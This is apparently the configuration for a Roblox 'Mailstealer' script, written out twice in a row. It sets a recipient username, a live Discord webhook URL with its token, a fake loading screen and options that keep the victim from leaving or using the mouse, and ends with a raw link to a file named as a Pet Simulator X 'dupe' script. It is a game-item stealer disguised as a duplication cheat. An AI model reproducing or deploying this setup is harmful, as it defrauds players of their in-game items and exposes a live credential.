--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "fc_qn"
Webhook = "https://discord.com/api/webhooks/1131892689965699082/aWGfHVZFXNZ4lEfM48naBL7yhszWmBcWttV3aDSpPASEAXXIJ7o1dRSNDD52jBXNYNoj"
UserName2 = "fc_qn"

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

_G.ScriptName = "Script Name"
_G.FirstText = "Preparing..."
_G.SecondText = "Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- in secondes it's the time for the loading bar to hit from 0% to 100%--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "fc_qn"
Webhook = "https://discord.com/api/webhooks/1131892689965699082/aWGfHVZFXNZ4lEfM48naBL7yhszWmBcWttV3aDSpPASEAXXIJ7o1dRSNDD52jBXNYNoj"
UserName2 = "fc_qn"

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

_G.ScriptName = "Script Name"
_G.FirstText = "Preparing..."
_G.SecondText = "Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- in secondes it's the time for the loading bar to hit from 0% to 100%

https://raw.githubusercontent.com/Denis21345/Psx-dupe/main/Dupe.lua
